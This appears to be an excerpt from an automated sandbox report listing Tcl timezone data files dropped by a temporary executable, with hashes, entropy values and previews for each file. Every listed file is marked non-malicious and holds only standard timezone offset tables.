                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Antarctica/Vostok) {. {-9223372036854775808 0 0 -00}. {-380073600 21600 0 +06}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):176
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.922114908130109
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqxVyWJooedVAIgoqxWJ0YF2XbeLo4cA4FH/h8QasWJ/n:SlSWB9IZaM3ymSDdVAIgo2Q2XbUyAK8H
                                                                                                                                                                                                                                                                                                                                MD5:0F69284483D337DC8202970461A28386
                                                                                                                                                                                                                                                                                                                                SHA1:0D4592B8EBE070119CB3308534FE9A07A758F309
                                                                                                                                                                                                                                                                                                                                SHA-256:3A5DB7C2C71F95C495D0884001F82599E794118452E2748E95A7565523546A8E
                                                                                                                                                                                                                                                                                                                                SHA-512:D9F2618B153BFE4888E893A62128BE0BD59DFAFC824DA629454D5D541A9789536AC029BF73B6E9749409C522F450D53A270D302B2CF084444EA64D9138D77DFE
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Europe/Oslo)]} {. LoadTimeZoneFile Europe/Oslo.}.set TZData(:Arctic/Longyearbyen) $TZData(:Europe/Oslo).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):166
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.7788335911117095
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyq8t1zVAIgNsM1E2WFK4h4WFK81S:SlSWB9IZaM3yN1zVAIgaM1E2wKs4wK8c
                                                                                                                                                                                                                                                                                                                                MD5:BBAFEA8E55A739C72E69A619C406BD5D
                                                                                                                                                                                                                                                                                                                                SHA1:0C2793114CA716C5DBAF081083DF1E137F1D0A63
                                                                                                                                                                                                                                                                                                                                SHA-256:6E69C5C3C3E1C98F24F5F523EC666B82534C9F33132A93CCC1100F27E594027F
                                                                                                                                                                                                                                                                                                                                SHA-512:7741F2281FDCA8F01A75ABEBF908F0B70320C4C026D90D4B0C283F3E2B8C47C95263569916EF83CAD40C87D5B6E714045D0B43370A263BC7BE80EC3DA62CC82F
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Asia/Riyadh)]} {. LoadTimeZoneFile Asia/Riyadh.}.set TZData(:Asia/Aden) $TZData(:Asia/Riyadh).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1580
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.640808791765599
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:cQveh8mSsOXEFCMiq90DIgb5j6gMJR/4TJTXSATo6SSsMuRFnCYRluoCC1Q0cxfw:50Fqq9iTVrXjS0qBsW
                                                                                                                                                                                                                                                                                                                                MD5:AC511C65052CE2D780FD583E50CB475C
                                                                                                                                                                                                                                                                                                                                SHA1:6B9171A13F6E6F33F878A347173A03112BCF1B89
                                                                                                                                                                                                                                                                                                                                SHA-256:C9739892527CCEBDF91D7E22A6FCD0FD57AAFA6A1B4535915AC82CF6F72F34A4
                                                                                                                                                                                                                                                                                                                                SHA-512:12743486EB02C241C90ECCEDD323D0F560D5FA1F55CB3EBB5AF3A65331D362433F2EAF7285B19335F5C262DA033EB8BE5A4618794EA74DFCD4107C170035CE96
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Almaty) {. {-9223372036854775808 18468 0 LMT}. {-1441170468 18000 0 +05}. {-1247547600 21600 0 +06}. {354909600 25200 1 +06}. {370717200 21600 0 +06}. {386445600 25200 1 +06}. {402253200 21600 0 +06}. {417981600 25200 1 +06}. {433789200 21600 0 +06}. {449604000 25200 1 +06}. {465336000 21600 0 +06}. {481060800 25200 1 +06}. {496785600 21600 0 +06}. {512510400 25200 1 +06}. {528235200 21600 0 +06}. {543960000 25200 1 +06}. {559684800 21600 0 +06}. {575409600 25200 1 +06}. {591134400 21600 0 +06}. {606859200 25200 1 +06}. {622584000 21600 0 +06}. {638308800 25200 1 +06}. {654638400 21600 0 +06}. {670363200 18000 0 +05}. {670366800 21600 1 +05}. {686091600 18000 0 +05}. {695768400 21600 0 +06}. {701812800 25200 1 +06}. {717537600 21600 0 +06}. {733262400 25200 1 +06}. {748987200 21600 0 +06}. {764712000 25200 1 +06}. {780436800 21
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):7055
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.621680472512772
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:Rnv8A4XkyKfUN9QXCkFpej4g2uMekzdgyvwKVuKEZhfuITrar2gsq0teU:RvMw2y3p+4g2PxbLS5
                                                                                                                                                                                                                                                                                                                                MD5:703F8A37D41186AC8CDBCB86B9FE6C1B
                                                                                                                                                                                                                                                                                                                                SHA1:B2D7FCBD290DA0FEB31CD310BA29FE27A59822BE
                                                                                                                                                                                                                                                                                                                                SHA-256:847FA8211956C5930930E2D7E760B1D7F551E8CDF99817DB630222C960069EB8
                                                                                                                                                                                                                                                                                                                                SHA-512:66504E448469D2358C228966739F0FEB381BF862866A951B092A600A17DAD80E6331F6D88C4CFCE483F45E79451722A19B37291EDA75C7CD4D7E0A7E82096F47
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Amman) {. {-9223372036854775808 8624 0 LMT}. {-1230776624 7200 0 EET}. {108165600 10800 1 EEST}. {118270800 7200 0 EET}. {136591200 10800 1 EEST}. {149806800 7200 0 EET}. {168127200 10800 1 EEST}. {181342800 7200 0 EET}. {199749600 10800 1 EEST}. {215643600 7200 0 EET}. {231285600 10800 1 EEST}. {244501200 7200 0 EET}. {262735200 10800 1 EEST}. {275950800 7200 0 EET}. {481154400 10800 1 EEST}. {496962000 7200 0 EET}. {512949600 10800 1 EEST}. {528670800 7200 0 EET}. {544399200 10800 1 EEST}. {560120400 7200 0 EET}. {575848800 10800 1 EEST}. {592174800 7200 0 EET}. {610581600 10800 1 EEST}. {623624400 7200 0 EET}. {641167200 10800 1 EEST}. {655074000 7200 0 EET}. {671839200 10800 1 EEST}. {685918800 7200 0 EET}. {702856800 10800 1 EEST}. {717973200 7200 0 EET}. {733701600 10800 1 EEST}. {749422800 7200 0 EET}. {765151200 10800 1
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2014
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.680306971172711
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:cQMe/VrghhF87/Fpd2kNNxLcULBQdHl2yYvpQ62itgUiRrn5d6kGFF6UERWkBUHA:5ah2zFvpchKvW62XPdXJMwT3Lea
                                                                                                                                                                                                                                                                                                                                MD5:E0396BBBB3FDDD2B651D2DBB4EF90884
                                                                                                                                                                                                                                                                                                                                SHA1:C1FFCDC6EB77B5F4CFAFA90EA8E1025DB142D5C5
                                                                                                                                                                                                                                                                                                                                SHA-256:6A9B4EF8FBED758E8D1737C79D803F9DF4F5BF61F115064ED60DA2397B88FE19
                                                                                                                                                                                                                                                                                                                                SHA-512:8FB6D19189142F11812B82F5803F4E5C85BF107689D317305D32EF71905DC9E0655DD2F2D4CE234B5872A6BF452670221F94EF1D48EF776C002AA5A484C2481B
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Anadyr) {. {-9223372036854775808 42596 0 LMT}. {-1441194596 43200 0 +12}. {-1247572800 46800 0 +14}. {354884400 50400 1 +14}. {370692000 46800 0 +13}. {386420400 43200 0 +13}. {386424000 46800 1 +13}. {402231600 43200 0 +12}. {417960000 46800 1 +13}. {433767600 43200 0 +12}. {449582400 46800 1 +13}. {465314400 43200 0 +12}. {481039200 46800 1 +13}. {496764000 43200 0 +12}. {512488800 46800 1 +13}. {528213600 43200 0 +12}. {543938400 46800 1 +13}. {559663200 43200 0 +12}. {575388000 46800 1 +13}. {591112800 43200 0 +12}. {606837600 46800 1 +13}. {622562400 43200 0 +12}. {638287200 46800 1 +13}. {654616800 43200 0 +12}. {670341600 39600 0 +12}. {670345200 43200 1 +12}. {686070000 39600 0 +11}. {695746800 43200 0 +13}. {701791200 46800 1 +13}. {717516000 43200 0 +12}. {733240800 46800 1 +13}. {748965600 43200 0 +12}. {764690400 46
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1607
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.623112789966889
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:cQJeoR9NSVYlS7hhmSQcwqSlhJS9yiIoSBHrSLUSIYdDS7/S5c3oSATo03CRJS2I:5fZlkhs7bqIwIoMpqDS7oXb0w+sRBlL
                                                                                                                                                                                                                                                                                                                                MD5:410226AA30925F31BA963139FD594AEB
                                                                                                                                                                                                                                                                                                                                SHA1:860E17C83D0DF2CBB4B8E73B9C7CB956994F5549
                                                                                                                                                                                                                                                                                                                                SHA-256:69402CA6D56138A6A6D09964B90D1781A7CBEFBDFFE506B7292758EC24740B0E
                                                                                                                                                                                                                                                                                                                                SHA-512:AE2610D1D779500132D5FA12E7529551ECD009848619C7D802F6EE89B0D2C3D6E7C91FB83DA7616180C166CE9C4499D7A2A4FEB5373621353640A71830B655A3
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Aqtau) {. {-9223372036854775808 12064 0 LMT}. {-1441164064 14400 0 +04}. {-1247544000 18000 0 +05}. {370724400 21600 0 +06}. {386445600 18000 0 +05}. {386449200 21600 1 +05}. {402256800 18000 0 +05}. {417985200 21600 1 +05}. {433792800 18000 0 +05}. {449607600 21600 1 +05}. {465339600 18000 0 +05}. {481064400 21600 1 +05}. {496789200 18000 0 +05}. {512514000 21600 1 +05}. {528238800 18000 0 +05}. {543963600 21600 1 +05}. {559688400 18000 0 +05}. {575413200 21600 1 +05}. {591138000 18000 0 +05}. {606862800 21600 1 +05}. {622587600 18000 0 +05}. {638312400 21600 1 +05}. {654642000 18000 0 +05}. {670366800 14400 0 +04}. {670370400 18000 1 +04}. {686095200 14400 0 +04}. {695772000 18000 0 +05}. {701816400 21600 1 +05}. {717541200 18000 0 +05}. {733266000 21600 1 +05}. {748990800 18000 0 +05}. {764715600 21600 1 +05}. {780440400 180
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1608
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.6301391279603696
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:5FhXlkhs7bqIwIoMpqDS7oXb0w+bBijbbyzIr1jJL:PtCOgZbdp
                                                                                                                                                                                                                                                                                                                                MD5:B8D914F33D568AE8EB46B7F3FC5BF944
                                                                                                                                                                                                                                                                                                                                SHA1:91DE61EC025E8F74D9CD10816C3534B5F8D397F7
                                                                                                                                                                                                                                                                                                                                SHA-256:9C1C30ADD1919951350C86DA6B716326178CF74A849A3350AE147DD2ADC34049
                                                                                                                                                                                                                                                                                                                                SHA-512:A32B34C15D94C42E9DF13316ACB9E0C9AF151F2EF14F502BE1A75E40735A2BC5D9E59244A72ACFB68184DA0D62A48FCC7AB288F1BA85DBB4DC385FA04BF3075D
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Aqtobe) {. {-9223372036854775808 13720 0 LMT}. {-1441165720 14400 0 +04}. {-1247544000 18000 0 +05}. {354913200 21600 1 +06}. {370720800 21600 0 +06}. {386445600 18000 0 +05}. {386449200 21600 1 +05}. {402256800 18000 0 +05}. {417985200 21600 1 +05}. {433792800 18000 0 +05}. {449607600 21600 1 +05}. {465339600 18000 0 +05}. {481064400 21600 1 +05}. {496789200 18000 0 +05}. {512514000 21600 1 +05}. {528238800 18000 0 +05}. {543963600 21600 1 +05}. {559688400 18000 0 +05}. {575413200 21600 1 +05}. {591138000 18000 0 +05}. {606862800 21600 1 +05}. {622587600 18000 0 +05}. {638312400 21600 1 +05}. {654642000 18000 0 +05}. {670366800 14400 0 +04}. {670370400 18000 1 +04}. {686095200 14400 0 +04}. {695772000 18000 0 +05}. {701816400 21600 1 +05}. {717541200 18000 0 +05}. {733266000 21600 1 +05}. {748990800 18000 0 +05}. {764715600 21
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):847
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.852939540326754
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:cQgZeRHINS62DS7hhmSQcwqSlhJS9yiIoSBHrSLUSIYdDS7/S5c3oSATo03CRJL:5g8U0khs7bqIwIoMpqDS7oXb0L
                                                                                                                                                                                                                                                                                                                                MD5:BFDAC4AE48AD49E5C0A048234586507E
                                                                                                                                                                                                                                                                                                                                SHA1:ACFE49AED50D0FDF2978034BB3098331F6266CC8
                                                                                                                                                                                                                                                                                                                                SHA-256:77FB5A9F578E75EEC3E3B83618C99F33A04C19C8BB9AFB314888091A8DD64AA3
                                                                                                                                                                                                                                                                                                                                SHA-512:11B412E0856BD384080B982C9DE6CE196E8C71A68096F7ED22972B7617533F9BD92EFA4C153F2CEE7EA4F0DE206281B6B9066C5969AFFE913AF2FA5CF82EDD90
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Ashgabat) {. {-9223372036854775808 14012 0 LMT}. {-1441166012 14400 0 +04}. {-1247544000 18000 0 +05}. {354913200 21600 1 +05}. {370720800 18000 0 +05}. {386449200 21600 1 +05}. {402256800 18000 0 +05}. {417985200 21600 1 +05}. {433792800 18000 0 +05}. {449607600 21600 1 +05}. {465339600 18000 0 +05}. {481064400 21600 1 +05}. {496789200 18000 0 +05}. {512514000 21600 1 +05}. {528238800 18000 0 +05}. {543963600 21600 1 +05}. {559688400 18000 0 +05}. {575413200 21600 1 +05}. {591138000 18000 0 +05}. {606862800 21600 1 +05}. {622587600 18000 0 +05}. {638312400 21600 1 +05}. {654642000 18000 0 +05}. {670366800 14400 0 +04}. {670370400 18000 1 +04}. {686095200 14400 0 +04}. {695772000 18000 0 +05}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):177
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.750782589043179
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyq8xEYM4DdVAIgN/ZEYvCHt2WFKUNSH+WFKYEYMvn:SlSWB9IZaM3yRhVAIgH1CHt2wKUNSewa
                                                                                                                                                                                                                                                                                                                                MD5:73E1F618FB430C503A1499E3A0298C97
                                                                                                                                                                                                                                                                                                                                SHA1:29F31A7C9992F9D9B3447FCBC878F1AF8E4BD57F
                                                                                                                                                                                                                                                                                                                                SHA-256:5917FC603270C0470D2EC416E6C85E999A52B6A384A2E1C5CFC41B29ABCA963A
                                                                                                                                                                                                                                                                                                                                SHA-512:FAE39F158A4F47B4C37277A1DC77B8524DD4287EBAD5D8E6CBB906184E6DA275A308B55051114F4CD4908B449AE3C8FD48384271E3F7106801AD765E5958B4DD
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Asia/Ashgabat)]} {. LoadTimeZoneFile Asia/Ashgabat.}.set TZData(:Asia/Ashkhabad) $TZData(:Asia/Ashgabat).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1608
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.6351436957032477
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:55IZlkhs7bqIwIoMpqDS7oXb0w+bBijbbyblL:X8COgZbd4x
                                                                                                                                                                                                                                                                                                                                MD5:F2A86E76222B06103F6C1E8F89EB453E
                                                                                                                                                                                                                                                                                                                                SHA1:D73938EBCA8C1340A7C86E865492EE581DFFC393
                                                                                                                                                                                                                                                                                                                                SHA-256:211AB2318746486C356091EC2D3508D6FB79B9EBC78FC843BF2ADC96A38C4217
                                                                                                                                                                                                                                                                                                                                SHA-512:B5F4F8FF11FA6D113B23F60D64E1737C7FABDDEBF12C37138F0FA05254E6C1643A2D3CA6C322943F4E877CE2E3736CF0F0741DD390C79E7EE94D56361B14BF45
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Atyrau) {. {-9223372036854775808 12464 0 LMT}. {-1441164464 10800 0 +03}. {-1247540400 18000 0 +05}. {370724400 21600 0 +06}. {386445600 18000 0 +05}. {386449200 21600 1 +05}. {402256800 18000 0 +05}. {417985200 21600 1 +05}. {433792800 18000 0 +05}. {449607600 21600 1 +05}. {465339600 18000 0 +05}. {481064400 21600 1 +05}. {496789200 18000 0 +05}. {512514000 21600 1 +05}. {528238800 18000 0 +05}. {543963600 21600 1 +05}. {559688400 18000 0 +05}. {575413200 21600 1 +05}. {591138000 18000 0 +05}. {606862800 21600 1 +05}. {622587600 18000 0 +05}. {638312400 21600 1 +05}. {654642000 18000 0 +05}. {670366800 14400 0 +04}. {670370400 18000 1 +04}. {686095200 14400 0 +04}. {695772000 18000 0 +05}. {701816400 21600 1 +05}. {717541200 18000 0 +05}. {733266000 21600 1 +05}. {748990800 18000 0 +05}. {764715600 21600 1 +05}. {780440400 18
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1643
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.6348723729667975
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:cQcTe0yZH76UtjUtUVmFbmU0cybUJN2cU2U9U56UJMlUoCUUbu/UTbU4UdTbU8U6:5cp6pLmFsyN2LouCIpYZgrCi
                                                                                                                                                                                                                                                                                                                                MD5:2C0422E86BA0AECAA97CA01F3A27B797
                                                                                                                                                                                                                                                                                                                                SHA1:C28FD8530B7895B4631EA0CAE03E6019561C4C40
                                                                                                                                                                                                                                                                                                                                SHA-256:D5D69D7A4FE29761C5C3FFBB41A4F8B6B5F2101A34678B1FA9B1D39FC5478EA8
                                                                                                                                                                                                                                                                                                                                SHA-512:3C346DE7E82B8EF1783F5A6D8A6099F7A530DD29AD48EDBB72F019ADC47155A703845503B1DD2589315BB67FA40AEF584313150686248DF45F983781F4B18710
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Baghdad) {. {-9223372036854775808 10660 0 LMT}. {-2524532260 10656 0 BMT}. {-1641005856 10800 0 +03}. {389048400 14400 0 +03}. {402264000 10800 0 +03}. {417906000 14400 1 +03}. {433800000 10800 0 +03}. {449614800 14400 1 +03}. {465422400 10800 0 +03}. {481150800 14400 1 +03}. {496792800 10800 0 +03}. {512517600 14400 1 +03}. {528242400 10800 0 +03}. {543967200 14400 1 +03}. {559692000 10800 0 +03}. {575416800 14400 1 +03}. {591141600 10800 0 +03}. {606866400 14400 1 +03}. {622591200 10800 0 +03}. {638316000 14400 1 +03}. {654645600 10800 0 +03}. {670464000 14400 1 +03}. {686275200 10800 0 +03}. {702086400 14400 1 +03}. {717897600 10800 0 +03}. {733622400 14400 1 +03}. {749433600 10800 0 +03}. {765158400 14400 1 +03}. {780969600 10800 0 +03}. {796694400 14400 1 +03}. {812505600 10800 0 +03}. {828316800 14400 1 +03}. {844128000 1
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):166
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.732157428331905
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyq8hHVAIgNvZAvxL2WFKENUKMFB/4WFKKu:SlSWB9IZaM3yBHVAIgPAvxL2wKENUr/i
                                                                                                                                                                                                                                                                                                                                MD5:6291D60E3A30B76FEB491CB944BC2003
                                                                                                                                                                                                                                                                                                                                SHA1:3D31032CF518A712FBA49DEC42FF3D99DD468140
                                                                                                                                                                                                                                                                                                                                SHA-256:A462F83DDB0CCC41AC10E0B5B98287B4D89DA8BBBCA869CCFB81979C70613C6C
                                                                                                                                                                                                                                                                                                                                SHA-512:C62D44527EAD47D2281FF951B9CF84C297859CFDC9A497CB92A583B6012B2B9DAAE9924EF17BC6B7CD317B770FF4924D8E1E77ED2E0EBC02502530D132EDE35B
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Asia/Qatar)]} {. LoadTimeZoneFile Asia/Qatar.}.set TZData(:Asia/Bahrain) $TZData(:Asia/Qatar).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2075
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.5206282649651808
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:cQ4ekZqpkb/cXXn8UDu5u8WmFeb/RLc9qENkw/ybt8i9E60339UyuU+DTO1KKlYX:5YTVOZmF7N76eHIAMsiWVyv2Te
                                                                                                                                                                                                                                                                                                                                MD5:460EDC7D17FFA6AF834B6474D8262FB0
                                                                                                                                                                                                                                                                                                                                SHA1:913E117814A5B4B7283A533F47525C8A0C68FD3C
                                                                                                                                                                                                                                                                                                                                SHA-256:0A1FDA259EE5EBC779768BBADACC7E1CCAC56484AA6C03F7C1F79647AB79593D
                                                                                                                                                                                                                                                                                                                                SHA-512:4047A7AD5F248F0B304FEF06C73EA655D603C39B6AC74629A2ADD49A93E74B23F458DC70E8150AD3F5BBF773F2387907B4BB69A95EB945B9FA432CA6B8AB173D
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Baku) {. {-9223372036854775808 11964 0 LMT}. {-1441163964 10800 0 +03}. {-405140400 14400 0 +04}. {354916800 18000 1 +04}. {370724400 14400 0 +04}. {386452800 18000 1 +04}. {402260400 14400 0 +04}. {417988800 18000 1 +04}. {433796400 14400 0 +04}. {449611200 18000 1 +04}. {465343200 14400 0 +04}. {481068000 18000 1 +04}. {496792800 14400 0 +04}. {512517600 18000 1 +04}. {528242400 14400 0 +04}. {543967200 18000 1 +04}. {559692000 14400 0 +04}. {575416800 18000 1 +04}. {591141600 14400 0 +04}. {606866400 18000 1 +04}. {622591200 14400 0 +04}. {638316000 18000 1 +04}. {654645600 14400 0 +04}. {670370400 10800 0 +03}. {670374000 14400 1 +03}. {686098800 10800 0 +03}. {701823600 14400 1 +03}. {717548400 14400 0 +04}. {820440000 14400 0 +04}. {828234000 18000 1 +05}. {846378000 14400 0 +04}. {852062400 14400 0 +04}. {859680000 18000
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):174
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.863210418273511
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFx52WFKELYOUXGm2OHB+kevXZKmrROpDvFFsQ+8EXVeVSYvC:SlSWB9X52wKELPm2OHxePZ3FO1Rb+UVe
                                                                                                                                                                                                                                                                                                                                MD5:8291C9916E9D5E5C78DE38257798799D
                                                                                                                                                                                                                                                                                                                                SHA1:F67A474337CF5FF8460911C7003930455AA0C530
                                                                                                                                                                                                                                                                                                                                SHA-256:ED9D1C47D50461D312C7314D5C1403703E29EE14E6BAC97625EFB06F38E4942C
                                                                                                                                                                                                                                                                                                                                SHA-512:9B552812A0001271980F87C270EF4149201403B911826BDF17F66EE1015B9AC859C1B2E7BB4EB6BC56E37CDB24097BF001201C34AD7D4C0C910AE17CFEC36C8B
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Bangkok) {. {-9223372036854775808 24124 0 LMT}. {-2840164924 24124 0 BMT}. {-1570084924 25200 0 +07}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2044
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.6106776173203916
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:5Mi17A9/IJ4vQayW+dRvV8YzXJIq79Af3AuyqM7FfiC/L7UVtrBju6waUwcTLTTg:9jFRRCfQuiB7TQZ
                                                                                                                                                                                                                                                                                                                                MD5:DC7A71DAB17C7F4A348DC1EE2FC458C5
                                                                                                                                                                                                                                                                                                                                SHA1:982FAB93A637D18A049DDBE96B0341736C66561D
                                                                                                                                                                                                                                                                                                                                SHA-256:52DB3278189AA2380D84A81199A2E7F3B40E9706228D2291C6257FD513D78667
                                                                                                                                                                                                                                                                                                                                SHA-512:90659D37D2A2E8574A88FD7F222C28D9572A9866FC3459B0CC1760FECBC7C4A0574B224C252877D723B06DD72165C4FE368D5B00DAB662B85D2E0F4CB2A89271
                                                                                                                                                                                                                                                                                                                                Malicious:false
